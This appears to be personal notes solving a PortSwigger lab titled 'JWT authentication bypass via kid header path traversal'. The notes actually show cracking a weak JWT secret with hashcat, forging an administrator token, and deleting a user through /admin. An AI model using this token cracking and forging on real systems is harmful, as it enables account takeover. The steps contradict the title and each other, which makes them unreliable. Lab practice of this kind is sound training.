JWT authentication bypass via kid header path traversal - %
https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-kid-header-path-traversal
Description
Solution
Go to login page and access as wiener user.
JWT extension reveal that there's a JWT token, obviously related to wiener user account

{"iss":"portswigger","exp":1742682771,"sub":"wiener"}
Save the item into a file called 'jwt' to prepare input for our brute force attack.
eyJraWQiOiI3NTUzZjE1OC0zOTA5LTRiNDAtOGZhMy0zNDZmM2ZiZTViOTYiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTc0MjY4Mjc3MSwic3ViIjoid2llbmVyIn0.1h8m2wyXUGHZfKhTiOEKAvdKBhkgK5cDAGajwa2zrTo
hashcat -a 0 -m 16500 jwt ~/Documents/wordlists/jwt.secrets.list

Well done, 'secret1' is the result.
Using JSON Web Tokens tab, modify the sub field inserting: "administrator
", select "recalculate Signature" and insert there: "secret1
"

after that, go again into Pretty tab and change the id value to 'administrator': GET /my-account?id=administrator HTTP/2
and delete the signature of the cookie session (the last part):
GET /admin HTTP/2
Host: 0a71008804ff6c6185fbc1cf004b005c.web-security-academy.net
Cookie: session=eyJraWQiOiI4MmRmZWY5OC02YWE0LTRkNTItODNkOS03NTMwNzI5NmNhYTkiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTc0MjY4NDUwOSwic3ViIjoiYWRtaW5pc3RyYXRvciJ9.t5w7XuZemQGQB2xo1NoxuYYgUGWU_Tro27qR-RT4oQU
click first on the Send button and then on Following redirection button

Now, we're authenticated as administrator!
Checking the response the admin panel's path is: /admin


analyzing the response, we see that the request to delete the user Carlos is the following: GET /admin/delete?username=carlos HTTP/2

So, Send and click to Following redirection to delete it and complete the lab.

Last updated